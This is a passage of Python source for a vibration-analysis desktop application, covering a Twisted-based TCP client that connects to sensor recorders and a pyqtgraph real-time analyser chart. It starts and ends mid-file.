dir_name = QFileDialog.getExistingDirectory(self, 'Export WAV', self.wavSaveDir.text(),
QFileDialog.ShowDirsOnly)
if len(dir_name) > 0:
self.wavSaveDir.setText(dir_name)
@staticmethod
def alert_on_change(title, text='Change will not take effect until the application is restarted',
icon=QMessageBox.Warning):
msg_box = QMessageBox()
msg_box.setText(text)
msg_box.setIcon(icon)
msg_box.setWindowTitle(title)
msg_box.exec()
@staticmethod
def __parse_frd(file_name):
'''
Reads an FRD file and converts it into x,y vals but returns the raw txt (i.e. we validate the data on load).
:param file_name: the file.
:return: file_name, the frd as an ndarray in str format.
'''
if file_name is not None:
comment_char = None
with open(file_name) as f:
c = f.read(1)
if not c.isalnum():
comment_char = c
f, m = np.genfromtxt(file_name, comments=comment_char, unpack=True, usecols=(0, 1))
arr = np.vstack((f, m))
return file_name, np_to_str(arr)
return None, None
def keep_range(min_widget, max_widget, range):
if min_widget.value() + range >= max_widget.value():
min_widget.setValue(max_widget.value()-range)
if max_widget.value() - range <= min_widget.value():
max_widget.setValue(min_widget.value()+range)
```
#### File: python/model/recorders.py
```python
import json
import logging
import math
import time
from collections import Sequence
import numpy as np
import qtawesome as qta
from qtpy import QtWidgets
from qtpy.QtCore import QObject, Signal, QThreadPool
from qtpy.QtWidgets import QMessageBox
from twisted.internet.protocol import connectionDone
from twisted.protocols.basic import LineReceiver
from common import RingBuffer
from model.log import to_millis
logger = logging.getLogger('qvibe.recorders')
class RecorderSignals(QObject):
on_status_change = Signal(str, bool)
class Recorder:
def __init__(self, ip_address, idx, parent_layout, parent, target_config, reactor):
''' Adds widgets to the main screen to display another recorder. '''
self.__ip_address = ip_address
self.__target_config = target_config
self.signals = RecorderSignals()
self.__reset_on_snap = False
self.__name = None
self.__reactor = reactor
self.__listener = None
self.__snap_idx = 0
self.__buffer = []
self.__parent_layout = parent_layout
# init the widgets on screen which control it
self.__recorder_layout = QtWidgets.QVBoxLayout()
self.__recorder_layout.setObjectName(f"recorders_layout_{idx}")
self.__connect_button = QtWidgets.QPushButton(parent)
self.__connect_button.setText('Connect')
self.__connect_button.setObjectName(f"connect_recorder_button_{idx}")
self.__connect_button.clicked.connect(self.connect)
self.__connect_button.setIcon(qta.icon('fa5s.sign-in-alt'))
self.__disconnect_button = QtWidgets.QPushButton(parent)
self.__disconnect_button.setText('Disconnect')
self.__disconnect_button.setObjectName(f"disconnect_recorder_button_{idx}")
self.__disconnect_button.clicked.connect(self.disconnect)
self.__disconnect_button.setIcon(qta.icon('fa5s.sign-out-alt'))
self.__disconnect_button.setEnabled(False)
self.__ip_address_label = QtWidgets.QLabel(parent)
self.__ip_address_label.setObjectName(f"ip_address_{idx}")
self.__ip_address_label.setText(ip_address)
self.__connected = QtWidgets.QCheckBox(parent)
self.__connected.setObjectName(f"connected_{idx}")
self.__connected.setText('Connected?')
self.__connected.setEnabled(False)
self.__recording = QtWidgets.QCheckBox(parent)
self.__recording.setObjectName(f"recording_{idx}")
self.__recording.setText('Recording?')
self.__recording.setEnabled(False)
self.__button_layout = QtWidgets.QHBoxLayout()
self.__recorder_layout.addWidget(self.__ip_address_label)
self.__button_layout.addWidget(self.__connect_button)
self.__button_layout.addWidget(self.__disconnect_button)
self.__recorder_layout.addLayout(self.__button_layout)
self.__checkbox_layout = QtWidgets.QHBoxLayout()
self.__checkbox_layout.addWidget(self.__connected)
self.__checkbox_layout.addWidget(self.__recording)
self.__recorder_layout.addLayout(self.__checkbox_layout)
self.__parent_layout.addLayout(self.__recorder_layout)
def __handle_status_change(self):
''' Updates various fields to reflect recorder status. '''
is_connected = self.__connected.isChecked()
self.__connect_button.setEnabled(not is_connected)
self.__disconnect_button.setEnabled(is_connected)
self.signals.on_status_change.emit(self.ip_address, is_connected)
@property
def ip_address(self):
return self.__ip_address
@property
def name(self):
return self.__name
@property
def target_config(self):
return self.__target_config
@target_config.setter
def target_config(self, target_config):
if target_config != self.__target_config:
self.__target_config = target_config
if self.__listener is not None:
self.__listener.signals.send_target(target_config)
@property
def connected(self):
return self.__connected.isChecked()
@connected.setter
def connected(self, connected):
if connected != self.__connected.isChecked():
logger.info(f"Connected state changing from {self.__connected.isChecked()} to {connected}")
self.__connected.setChecked(connected)
self.__handle_status_change()
@property
def recording(self):
return self.__recording.isChecked()
@recording.setter
def recording(self, recording):
if recording != self.__recording.isChecked():
logger.info(f"Recording state changing from {self.__recording.isChecked()} to {recording}")
self.__recording.setChecked(recording)
def connect(self):
''' Creates a RecorderListener if required and then connects it. '''
logger.info(f"Connecting to {self.ip_address}")
if self.__listener is None:
self.__listener = RecorderTwistedBridge(self.__reactor)
self.__listener.signals.on_socket_state_change.connect(self.__on_state_change)
self.__listener.signals.on_data.connect(self.__handle_data)
self.__listener.ip = self.ip_address
if self.connected is False:
self.__reactor.callFromThread(self.__listener.connect)
def __on_state_change(self, new_state):
'''
Reacts to connection state changes to determine if we are connected or not
propagates that status via a signal
'''
if new_state == 1:
self.connected = True
else:
self.connected = False
self.recording = False
if new_state != 0:
msg_box = QMessageBox()
msg_box.setText(f"Failed to connect to: \n\n {self.ip_address}")
msg_box.setIcon(QMessageBox.Critical)
msg_box.setWindowTitle('Connection Failed')
msg_box.exec()
def __handle_data(self, data):
'''
Main protocol handler which can react to data updates by recording them in the buffer and config updates by
validating device state to enable recording to start or sending new config if required.
'''
rcv = data
cmd = rcv[0:3]
dat = data[4:]
if cmd == 'DAT':
if self.recording is True:
if len(dat) > 0:
records = np.array([np.fromstring(r, sep='#', dtype=np.float64) for r in dat.split('|')])
if records.size > 0:
logger.debug(f"Buffering DAT {records[0,0]} - {records[-1,0]}")
# if the last record has a sample idx less than the first one then it must have suffered an overflow
if len(self.__buffer) > 0 and records[:, 0][-1] <= records[:, 0][0]:
logger.error(f"Sensor {self.ip_address} has overflowed")
self.__reset_on_snap = True
self.__buffer.extend(records)
else:
logger.error(f"Received empty array {dat}")
self.__reset_on_snap = True
else:
logger.error(f"Received empty array {dat}")
self.__reset_on_snap = True
elif cmd == 'DST':
logger.info(f"Received DST {dat}")
if RecorderConfig.from_dict(json.loads(dat)[0]) == self.__target_config:
self.recording = True
else:
self.recording = False
self.__listener.signals.send_target.emit(self.__target_config)
elif cmd == 'STR':
pass
elif rcv == 'ERROR':
logger.error(f"Received ERROR from {self.ip_address}")
self.__reset_on_snap = True
else:
logger.error(f"Received unknown payload from {self.ip_address} - {rcv}")
def disconnect(self):
''' Disconnects the listener if we have one. '''
if self.__listener is not None:
logger.info(f"Disconnecting from {self.ip_address}")
self.__listener.kill()
self.__listener = None
QThreadPool.globalInstance().releaseThread()
logger.info(f"Disconnected from {self.ip_address}")
def snap(self):
'''
:return: a 5 entry tuple with
- the ip of the recorder
- data since the last snap
- the snap idx
- whether the sensor has overflowed since the last snap
'''
errored = self.__reset_on_snap
if self.__reset_on_snap is True:
self.__reset_on_snap = False
start = time.time()
b = np.array(self.__buffer)
self.__buffer = []
self.__snap_idx += 1
end = time.time()
logger.debug(f"Snap {self.__snap_idx} : {b.shape[0]} in {to_millis(start, end)}ms")
return self.ip_address, b, self.__snap_idx, errored
def reset(self):
self.__buffer = []
def destroy(self):
logger.info(f"Destroying {self.ip_address}")
self.disconnect()
self.signals.disconnect()
self.__parent_layout.removeItem(self.__recorder_layout)
def replace(self, data):
'''
Replaces the current data with the supplied data. Intended to be used by loading.
:param data: the data.
'''
self.reset()
self.__buffer.extend(data)
class RecorderStore(Sequence):
'''
Stores all recorders known to the system.
'''
def __init__(self, target_config, parent_layout, parent, reactor, measurement_store):
self.signals = RecorderSignals()
self.__measurement_store = measurement_store
self.__parent_layout = parent_layout
self.__spacer_item = QtWidgets.QSpacerItem(20, 40,
QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Expanding)
self.__parent_layout.addItem(self.__spacer_item)
self.__parent = parent
self.__recorders = []
self.__target_config = target_config
self.__reactor = reactor
@property
def target_config(self):
return self.__target_config
@target_config.setter
def target_config(self, target_config):
self.__target_config = target_config
for r in self:
r.target_config = target_config
def append(self, ip_address):
''' adds a new recorder. '''
self.__parent_layout.removeItem(self.__spacer_item)
rec = Recorder(ip_address, len(self.__recorders), self.__parent_layout, self.__parent, self.__target_config,
self.__reactor)
self.__parent_layout.addItem(self.__spacer_item)
rec.signals.on_status_change.connect(self.__on_recorder_connect_event)
self.__recorders.append(rec)
return rec
def replace(self, ip, data):
rec = next((r for r in self if r.ip_address == ip), None)
if rec is None:
logger.info(f"Loading new recorder at {ip}")
rec = self.append(ip)
rec.replace(data)
def load(self, ip_addresses):
''' Creates recorders for all given IP addresses. '''
for ip in ip_addresses:
if next((r for r in self if r.ip_address == ip), None) is None:
logger.info(f"Loading new recorder at {ip}")
self.append(ip)
self.__measurement_store.append('rta', ip, None)
to_remove = [r for r in self if r.ip_address not in ip_addresses]
for r in to_remove:
logger.info(f"Discarding recorder from {r.ip_address}")
self.__recorders.remove(r)
self.__measurement_store.remove('rta', r.ip_address)
r.destroy()
def clear(self):
''' eliminates all recorders '''
self.load([])
def __getitem__(self, i):
return self.__recorders[i]
def __len__(self):
return len(self.__recorders)
def snap(self, connected_only=True):
'''
:return: current data for each recorder.
'''
return [r.snap() for r in self if connected_only is False or r.connected is True]
def reset(self):
''' clears all cached data. '''
for rec in self:
rec.reset()
def __on_recorder_connect_event(self, ip, connected):
'''
propagates a recorder status change.
:param ip: the ip.
:param connected: if it is connected.
'''
self.signals.on_status_change.emit(ip, connected)
def any_connected(self):
'''
:return: True if any recorded is connected.
'''
return any(r.connected is True for r in self)
def connect(self):
''' connects all recorders '''
for r in self:
r.connect()
def disconnect(self):
''' disconnects all recorders '''
for r in self:
r.disconnect()
class RecorderConfig:
def __init__(self):
self.__fs = None
self.__value_len = 2
self.__samples_per_batch = None
self.__accelerometer_enabled = False
self.__accelerometer_sens = None
self.__gyro_enabled = False
self.__gyro_sens = None
def to_dict(self):
return {
'fs': self.fs,
'sPB': self.samples_per_batch,
'aOn': self.accelerometer_enabled,
'aSens': self.accelerometer_sens,
'gOn': self.gyro_enabled,
'gSens': self.gyro_sens
}
@staticmethod
def from_dict(d):
rc = RecorderConfig()
if 'fs' in d:
rc.__fs = d['fs']
if 'sPB' in d:
rc.__samples_per_batch = d['sPB']
if 'aOn' in d:
rc.__accelerometer_enabled = d['aOn']
if 'aSens' in d:
rc.__accelerometer_sens = d['aSens']
if 'gOn' in d:
rc.__gyro_enabled = d['gOn']
if 'gSens' in d:
rc.__gyro_sens = d['gSens']
return rc
@property
def fs(self):
return self.__fs
@fs.setter
def fs(self, fs):
self.__fs = fs
@property
def samples_per_batch(self):
return self.__samples_per_batch
@samples_per_batch.setter
def samples_per_batch(self, samples_per_batch):
self.__samples_per_batch = samples_per_batch
@property
def accelerometer_enabled(self):
return self.__accelerometer_enabled
@accelerometer_enabled.setter
def accelerometer_enabled(self, accelerometer_enabled):
self.__accelerometer_enabled = accelerometer_enabled
@property
def accelerometer_sens(self):
return self.__accelerometer_sens
@accelerometer_sens.setter
def accelerometer_sens(self, accelerometer_sens):
self.__accelerometer_sens = accelerometer_sens
self.__recalc_len()
@property
def gyro_enabled(self):
return self.__gyro_enabled
@gyro_enabled.setter
def gyro_enabled(self, gyro_enabled):
self.__gyro_enabled = gyro_enabled
self.__recalc_len()
@property
def gyro_sens(self):
return self.__gyro_sens
@gyro_sens.setter
def gyro_sens(self, gyro_sens):
self.__gyro_sens = gyro_sens
def __recalc_len(self):
self.__value_len = 2 \
+ (3 if self.accelerometer_enabled else 0) \
+ (3 if self.gyro_enabled else 0)
@property
def value_len(self):
return self.__value_len
def __eq__(self, other):
if not isinstance(other, RecorderConfig):
return NotImplemented
return self.fs == other.fs \
and self.samples_per_batch == other.samples_per_batch \
and self.accelerometer_enabled == other.accelerometer_enabled \
and self.accelerometer_sens == other.accelerometer_sens \
and self.gyro_enabled == other.gyro_enabled \
and self.gyro_sens == other.gyro_sens
class RecorderSocketBridgeSignals(QObject):
on_socket_state_change = Signal(int)
on_data = Signal(str)
send_target = Signal(RecorderConfig)
class RecorderTwistedBridge:
def __init__(self, reactor):
super().__init__()
self.__reactor = reactor
self.__ip = None
self.signals = RecorderSocketBridgeSignals()
self.__endpoint = None
self.__protocol = None
self.__connect = None
self.__state = 0
self.signals.send_target.connect(self.__send_target_state)
@property
def ip(self):
return self.__ip
@ip.setter
def ip(self, ip):
self.__ip = ip
def connect(self):
''' Runs the twisted reactor. '''
from twisted.internet.endpoints import TCP4ClientEndpoint
from twisted.internet.endpoints import connectProtocol
logger.info(f"Starting Twisted endpoint on {self.ip}")
ip, port = self.ip.split(':')
self.__endpoint = TCP4ClientEndpoint(self.__reactor, ip, int(port))
self.__protocol = RecorderProtocol(self.signals.on_data, self.__on_state_change)
self.__connect = connectProtocol(self.__endpoint, self.__protocol)
self.__reactor.callLater(1, self.__cancel_if_not_connected)
def __cancel_if_not_connected(self):
if self.__state != 1:
logger.info(f"Cancelling connection to {self.ip} on timeout")
self.__connect.cancel()
self.__on_state_change(2)
self.kill()
self.__on_state_change(0)
def __on_state_change(self, new_state):
''' socket connection state change handler '''
if self.__state != new_state:
logger.info(f"Connection state change from {self.__state} to {new_state}")
self.__state = new_state
self.signals.on_socket_state_change.emit(new_state)
def __send_target_state(self, target_state):
''' writes a SET command to the socket. '''
msg = f"SET|{json.dumps(target_state.to_dict())}\r\n'".encode()
logger.info(f"Sending {msg} to {self.ip}")
self.__protocol.write(msg)
logger.info(f"Sent {msg} to {self.ip}")
def kill(self):
''' Tells the reactor to stop running and disconnects the socket. '''
if self.__protocol is not None:
if self.__protocol.transport is not None:
logger.info("Stopping the twisted protocol")
self.__protocol.transport.loseConnection()
logger.info("Stopped the twisted protocol")
elif self.__connect is not None:
logger.info("Cancelling connection attempt")
self.__reactor.callFromThread(self.__connect.cancel)
logger.info("Cancelled connection attempt")
class RecorderProtocol(LineReceiver):
''' Bridges the twisted network handler to/from Qt signals. '''
def __init__(self, on_data, on_state_change):
super().__init__()
self.__on_data = on_data
self.__on_state_change = on_state_change
def rawDataReceived(self, data):
pass
def connectionMade(self):
logger.info("Connection established, sending state change")
self.transport.setTcpNoDelay(True)
self.__on_state_change(1)
def connectionLost(self, reason=connectionDone):
logger.info(f"Connection lost because {reason}, sending state change")
self.__on_state_change(0)
def lineReceived(self, line):
logger.debug("Emitting DAT")
self.__on_data.emit(line.decode())
def write(self, line):
''' writes a SET command to the socket. '''
logger.debug("Sending SET")
self.sendLine(line)
```
#### File: python/model/rta.py
```python
import logging
import math
import numpy as np
import pyqtgraph as pg
import qtawesome as qta
from qtpy import QtWidgets, QtCore
from qtpy.QtWidgets import QMessageBox
from qtpy.QtCore import Qt
from common import format_pg_plotitem, block_signals, FlowLayout
from model.charts import VisibleChart, ChartEvent
from model.frd import ExportDialog
from model.preferences import RTA_TARGET, RTA_HOLD_SECONDS, RTA_SMOOTH_WINDOW, RTA_SMOOTH_POLY, ANALYSIS_HPF_RTA
from model.signal import smooth_savgol, Analysis, TriAxisSignal, REF_ACCELERATION_IN_G
TARGET_PLOT_NAME = 'Target'
logger = logging.getLogger('qvibe.rta')
class RTAEvent(ChartEvent):
def __init__(self, chart, measurement_name, input, idx, preferences, budget_millis, view, visible):
super().__init__(chart, measurement_name, input, idx, preferences, budget_millis)
self.__view = view
self.__visible = visible
def process(self):
self.output = [self.__make_sig(i) for i in self.input]
self.should_emit = True
def __make_sig(self, chunk):
tas = TriAxisSignal(self.preferences,
self.measurement_name,
chunk,
self.chart.fs,
self.chart.resolution_shift,
idx=self.idx,
mode='vibration' if self.preferences.get(ANALYSIS_HPF_RTA) is True else '',
view_mode='spectrogram',
pre_calc=self.__visible)
tas.set_view(self.__view, recalc=False)
if self.__visible:
tas.recalc()
return tas
class RTA(VisibleChart):
def __init__(self, parent_layout, parent_tab, chart, prefs, fs_widget, resolution_widget, fps_widget,
actual_fps_widget, mag_min_widget, mag_max_widget, freq_min_widget, freq_max_widget,
ref_curve_selector, show_value_selector, measurement_store_signals, colour_provider):
measurement_store_signals.measurement_added.connect(self.__add_measurement)
measurement_store_signals.measurement_deleted.connect(self.__remove_measurement)
self.__ui = ControlUi(parent_layout, parent_tab, prefs)
self.__known_measurements = []
self.__show_average = self.__ui.show_average.isChecked()
self.__ref_curve_selector = ref_curve_selector
self.__show_value_selector = show_value_selector
self.__ref_curve = None
self.__reset_selector(self.__ref_curve_selector)
self.__reset_selector(self.__show_value_selector)
self.__plots = {}
self.__plot_data = {}
self.__smooth = False
self.__colour_provider = colour_provider
self.__move_crosshairs = False
self.__chunk_calc = None
self.__ui.toggle_crosshairs.toggled[bool].connect(self.__toggle_crosshairs)
super().__init__(prefs, fs_widget, resolution_widget, fps_widget, actual_fps_widget,
False, coalesce=True, cache_size=-1, cache_purger=self.__purge_cache)
self.__peak_cache = {}
self.__hold_secs = self.__ui.hold_secs.value()
self.__show_peak = self.__ui.show_peak.isChecked()
self.__show_live = self.__ui.show_live.isChecked()
self.__target_data = None
self.__target_adjustment_db = self.__ui.target_adjust_db.value()
self.__show_target = self.__ui.show_target.isChecked()
self.__show_target_toggle = self.__ui.show_target
self.__ui.target_adjust_db.valueChanged.connect(self.__adjust_target_level)
self.__sg_wl = self.__ui.sg_window_length.value()
self.__sg_poly = None
self.__on_sg_poly(self.__ui.sg_poly_order.value())
self.__frame = 0
self.__time = -1
self.__update_rate = None
self.__active_view = None
self.__chart = chart
# wire the analysis to the view controls
self.__mag_min = lambda: mag_min_widget.value()
self.__mag_max = lambda: mag_max_widget.value()
self.__freq_min = lambda: freq_min_widget.value()
self.__freq_max = lambda: freq_max_widget.value()
self.__on_rta_view_change(self.__ui.rta_view.currentText())
self.__ui.rta_view.currentTextChanged.connect(self.__on_rta_view_change)
self.__on_rta_smooth_change(self.__ui.smooth_rta.isChecked())
self.__ui.smooth_rta.toggled[bool].connect(self.__on_rta_smooth_change)
self.__legend = None
format_pg_plotitem(self.__chart.getPlotItem(),
(0, self.fs / 2),
(-150, 150),
x_range=(self.__freq_min(), self.__freq_max()),
y_range=(self.__mag_min(), self.__mag_max()))
# link limit controls to the chart
mag_min_widget.valueChanged['int'].connect(self.__on_mag_limit_change)
mag_max_widget.valueChanged['int'].connect(self.__on_mag_limit_change)
freq_min_widget.valueChanged['int'].connect(self.__on_freq_limit_change)
freq_max_widget.valueChanged['int'].connect(self.__on_freq_limit_change)
# curve display wiring
self.__ui.show_peak.toggled[bool].connect(self.__on_show_peak_change)
self.__ui.show_live.toggled[bool].connect(self.__on_show_live_change)
self.__ui.show_average.toggled[bool].connect(self.__on_show_average_change)
self.__ui.show_target.toggled[bool].connect(self.__on_show_target_change)
self.__ui.hold_secs.valueChanged.connect(self.__set_max_cache_age)
# S-G filter params
self.__ui.sg_window_length.valueChanged['int'].connect(self.__on_sg_window_length)
self.__ui.sg_poly_order.valueChanged['int'].connect(self.__on_sg_poly)
self.reload_target()
# export
self.__ui.export_frd.clicked.connect(self.__export_frd)
# ref curves
self.__ref_curve_selector.currentTextChanged.connect(self.__set_reference_curve)
# marker curves
self.__show_value_selector.currentTextChanged.connect(self.__set_show_value_curve)
# crosshairs
self.__v_line_label = CurveAwareLabel()
self.__v_line = pg.InfiniteLine(angle=90, movable=False, label=self.__v_line_label,
labelOpts={'position': 0.95})
self.__h_line = pg.InfiniteLine(angle=0, movable=False, label=AccelerationLabel(), labelOpts={'position': 0.95})
self.__chart.getPlotItem().addItem(self.__v_line, ignoreBounds=True)
self.__chart.getPlotItem().addItem(self.__h_line, ignoreBounds=True)
def mouse_moved(evt):
pos = evt[0]
if self.__chart.getPlotItem().sceneBoundingRect().contains(pos) and self.__move_crosshairs is True:
mouse_point = self.__chart.getPlotItem().vb.mapSceneToView(pos)
self.__v_line.setPos(mouse_point.x())
self.__h_line.setPos(mouse_point.y())
self.__proxy = pg.SignalProxy(self.__chart.scene().sigMouseMoved, delay=0.125, rateLimit=20, slot=mouse_moved)
def __toggle_crosshairs(self, move_crosshairs):
self.__move_crosshairs = move_crosshairs
def __add_measurement(self, measurement):
'''
Adds the measurement to the ref curve selector.
:param measurement: the measurement.
'''
self.__known_measurements.append(measurement.key)
def __remove_measurement(self, measurement):
'''
Remove the measurement from the ref curve.
:param measurement: the measurement.
'''
if measurement.key in self.__known_measurements:
self.__known_measurements.remove(measurement.key)
self.__chunk_calc.reset(measurement.key)
self.remove_cached(measurement.key)
self.__remove_from_selector(self.__ref_curve_selector, measurement.key)
self.__remove_from_selector(self.__show_value_selector, measurement.key)
def __set_reference_curve(self, curve):
'''
Updates the reference curve.
:param curve: the new reference curve.
'''
new_curve = curve if curve != '' else None
old_curve = self.__ref_curve
if self.__ref_curve != new_curve:
logger.info(f"Updating reference curve from {self.__ref_curve} to {new_curve}")
self.__ref_curve = new_curve
min_y, max_y = self.__chart.getPlotItem().getViewBox().state['viewRange'][1]
adj = (max_y - min_y) / 2
if old_curve is None:
self.__chart.getPlotItem().setYRange(-adj, adj, padding=0.0)
elif self.__ref_curve is None:
centre = (self.__mag_max() - self.__mag_min()) / 2
self.__chart.getPlotItem().setYRange(centre - adj + self.__mag_min(), centre + adj + self.__mag_min(),
padding=0.0)
self.__render_target()
self.update_all_plots()
def __set_show_value_curve(self, curve):
'''
Updates the curve associated with the vline.
:param curve: the curve.
'''
curve = curve if curve != '' else None
if curve in self.__plots:
curve = self.__plots[curve]
else:
curve = None
self.__v_line_label.curve = curve
self.__v_line.label.valueChanged()
def __export_frd(self):
'''
Shows the export dialog.
'''
available_data = {n: d for n in self.cached_measurement_names() for d in self.cached_data(n) if d is not None}
if len(available_data.keys()) > 0:
ExportDialog(self.__chart, available_data).exec()
else:
msg_box = QMessageBox()
msg_box.setText('No data has been recorded')
msg_box.setIcon(QMessageBox.Warning)
msg_box.setWindowTitle('Nothing to export')
msg_box.exec()
def __on_sg_window_length(self, wl):
'''
Updates the S-G window length.
:param wl: the length.
'''
if wl % 2 == 0:
self.__ui.sg_window_length.setValue(wl + 1)
else:
self.__sg_wl = wl
if self.__smooth is True:
self.update_all_plots()
def __on_sg_poly(self, poly):
'''
Updates the S-G poly order.
:param poly: the poly order.
'''
self.__sg_poly = poly
wl_min = poly + 1
if wl_min % 2 == 0:
wl_min += 1
self.__ui.sg_window_length.setMinimum(wl_min)
if self.__smooth is True:
self.update_all_plots()
def __set_max_cache_age(self, seconds):
'''
Sets the max age of the cache in seconds.
:param seconds: the max age of a cache entry.
'''
self.__hold_secs = seconds
self.for_each_cache(self.__purge_cache)
def __on_show_peak_change(self, checked):
'''
shows or hides the peak curves.
:param checked: if checked then show the curves otherwise hide.
'''
self.__show_peak = checked
self.update_all_plots()
def __on_show_live_change(self, checked):
'''
shows or hides the live curves.
:param checked: if checked then show the curves otherwise hide.
'''
self.__show_live = checked
self.update_all_plots()
def __on_mag_limit_change(self, val):
'''
Updates the visible y axis range.
:param val: ignored.
'''
self.__chart.getPlotItem().setYRange(self.__mag_min(), self.__mag_max(), padding=0)
def __on_freq_limit_change(self, val):
'''
Updates the visible x axis range.
:param val: ignored.
'''
self.__chart.getPlotItem().setXRange(self.__freq_min(), self.__freq_max(), padding=0)
def __on_rta_smooth_change(self, state):
'''
Puts the visible curves into smoothed mode or not.
:param state: if checked then smooth else unsmoothed.
'''
self.__smooth = state
self.update_all_plots()
def __on_rta_view_change(self, view):
'''
Changes the current view (avg, peak, psd).
:param view: the view.
'''
old_view = self.__active_view
logger.info(f"Updating active view from {old_view} to {view}")
self.__active_view = view
def propagate_view_change(cache):
for c in cache:
c.set_view(view)
self.for_each_cache(propagate_view_change)
self.update_all_plots()
logger.info(f"Updated active view from {old_view} to {view}")
def __on_show_average_change(self, checked):
'''
whether to average the cached data.
:param checked: whether to apply averaging.
'''
self.__show_average = checked
self.update_all_plots()
def __on_show_target_change(self, checked):
'''
whether to show the target curve.
:param checked: whether to show the target.
'''
self.__show_target = checked
self.__render_target()
if self.__ref_curve == TARGET_PLOT_NAME:
self.update_all_plots()
def __adjust_target_level(self, adjustment):
''' Adjusts the target level. '''
self.__target_adjustment_db = adjustment
self.__render_target()
if self.__ref_curve == TARGET_PLOT_NAME:
self.update_all_plots()
def reload_target(self):
'''
Loads the target from preferences.
'''
if self.preferences.has(RTA_TARGET) is True:
self.__show_target_toggle.setEnabled(True)
self.__ui.target_adjust_db.setEnabled(True)
self.__ui.target_adjust_db.setValue(0)
import io
arr = np.loadtxt(io.StringIO(self.preferences.get(RTA_TARGET)), dtype=np.float64, ndmin=2)
f = arr[0]
m = arr[1]
if np.min(m) < 40.0:
adj = 85.0 - (np.mean(m[0: np.argmax(f > 60)]) if np.max(f) > 60 else np.mean(m))
adjusted_m = m + adj
else:
adjusted_m = m
self.__target_data = Analysis((f, adjusted_m, adjusted_m))
else:
self.__show_target_toggle.setChecked(False)
self.__show_target_toggle.setEnabled(False)
self.__ui.target_adjust_db.setValue(0)
self.__ui.target_adjust_db.setEnabled(False)
self.__target_data = None
self.__render_target()
def make_event(self, measurement_name, data, idx):
'''
create a min_nperseg sixed window on the data and slide it forward in fresh_sample_count
stride a window over the data in fresh_sample_count
:param measurement_name: the measurement the data came from.
:param data: the data to analyse.
:param idx: the index of the data set.
'''
chunks = self.__chunk_calc.recalc(measurement_name, data)
if chunks is not None:
return RTAEvent(self, measurement_name, chunks, idx, self.preferences, self.budget_millis,
self.__active_view, self.visible)
return None
def reset_chart(self):
'''
Removes all curves.
'''
for c in self.__plots.values():
self.__chart.removeItem(c)
self.__reset_selector(self.__ref_curve_selector)
self.__reset_selector(self.__show_value_selector)
self.__ref_curve = None
self.__v_line_label.curve = None
self.__plots = {}
self.__plot_data = {}
self.__chunk_calc = ChunkCalculator(self.min_nperseg, self.__get_stride())
def on_min_nperseg_change(self):
'''
Propagates min_nperseg to the chunk calculator.
'''
if self.__chunk_calc is None:
if self.min_nperseg is not None and self.fs is not None and self.fps is not None:
self.__chunk_calc = ChunkCalculator(self.min_nperseg, self.__get_stride())
else:
self.__chunk_calc.min_nperseg = self.min_nperseg
def __get_stride(self):
return int(self.fs / self.fps)
def on_fs_change(self):
if self.__chunk_calc is None:
if self.min_nperseg is not None and self.fs is not None and self.fps is not None:
self.__chunk_calc = ChunkCalculator(self.min_nperseg, self.__get_stride())
else:
self.__chunk_calc.stride = self.__get_stride()
def when_fps_changed(self):
if self.__chunk_calc is None:
if self.min_nperseg is not None and self.fs is not None and self.fps is not None:
self.__chunk_calc = ChunkCalculator(self.min_nperseg, self.__get_stride())
else:
self.__chunk_calc.stride = self.__get_stride()
@staticmethod
def __reset_selector(selector):
'''
Clears out the combo.
'''
with block_signals(selector):
selector.clear()
selector.addItem('')
def update_chart(self, measurement_name):
'''
Updates all the curves for the named recorder with the latest data and config.
:param measurement_name: the recorder.
'''
data = self.cached_data(measurement_name)
if data is not None and len(data) > 0:
if data[-1].shape[0] >= self.min_nperseg:
self.__display_triaxis_signal(data)
for axis in ['x', 'y', 'z', 'sum']:
self.render_peak(data, axis)
def __display_triaxis_signal(self, signals, plot_name_prefix=''):
'''
ensures the correct analysis curves for the signal are displayed on screen.
:param signal: the TriAxisSignals to average.
:param plot_name_prefix: extension to signal name for creating a plot name.
'''
for signal in signals:
if signal.view != self.__active_view:
logger.info(f"Updating active view from {signal.view} to {self.__active_view} at {signal.idx}")
signal.set_view(self.__active_view)
if signal.has_data(self.__active_view) is False and signal.shape[0] >= self.min_nperseg:
signal.recalc()
self.render_signal(signals, 'x', plot_name_prefix=plot_name_prefix)
self.render_signal(signals, 'y', plot_name_prefix=plot_name_prefix)
self.render_signal(signals, 'z', plot_name_prefix=plot_name_prefix)
self.render_signal(signals, 'sum', plot_name_prefix=plot_name_prefix)
def __purge_cache(self, cache):
'''
Purges the cache of data older than peak_secs.
:param cache: the cache (a deque)
'''
while len(cache) > 1:
latest = cache[-1].time[-1]
if (latest - cache[0].time[-1]) >= (self.__hold_secs * 1000.0):
cache.popleft()
else:
break
def __render_target(self):
'''
Renders the target data.
'''
if self.__target_data is None or self.__show_target is False:
if TARGET_PLOT_NAME in self.__plots:
self.__remove_named_plot(TARGET_PLOT_NAME)
elif self.__target_data is not None and self.__show_target is True:
pen_args = {'style': Qt.SolidLine}
y_db = self.__target_data.y + self.__target_adjustment_db
self.__render_or_update(pen_args, TARGET_PLOT_NAME, self.__target_data.x, y_db)
def render_peak(self, data, axis):
'''
Converts a peak dataset into a renderable plot item.
:param data: the cached data.
:param axis: the axis to display.
'''
y_data = x_data = pen_args = None
sig = getattr(data[-1], axis)
if self.__show_peak is True:
has_data = sig.get_analysis(self.__active_view)
if has_data is not None:
if all([d.shape[0] >= self.min_nperseg for d in data]):
data_ = [getattr(d, axis).get_analysis(self.__active_view).y for d in data]
y_data = np.maximum.reduce(data_)
x_data = has_data.x
pen_args = {'style': Qt.DashLine}
self.__manage_plot_item(f"{sig.measurement_name}:{sig.axis}:peak", data[-1].idx, sig.measurement_name, sig.axis,
x_data, y_data, pen_args)
def render_signal(self, data, axis, plot_name_prefix=''):
'''
Converts (one or more) signal into a renderable plot item.
:param data: the cached data.
:param axis: the axis to display.
:param plot_name_prefix: optional plot name prefix.
'''
y_data = y_avg = x_data = None
sig = getattr(data[-1], axis)
has_data = sig.get_analysis(self.__active_view)
if has_data is not None:
if self.__show_average is True:
if all([d.shape[0] >= self.min_nperseg for d in data]):
y_avg = np.average([getattr(d, axis).get_analysis(self.__active_view).y for d in data], axis=0)
if self.__show_live is True:
y_data = has_data.y
x_data = has_data.x
pen = {'style': Qt.SolidLine}
plot_name = f"{plot_name_prefix}{sig.measurement_name}:{sig.axis}"
self.__manage_plot_item(plot_name, data[-1].idx, sig.measurement_name, sig.axis, x_data, y_data, pen)
avg_pen = {'style': Qt.DashDotDotLine}
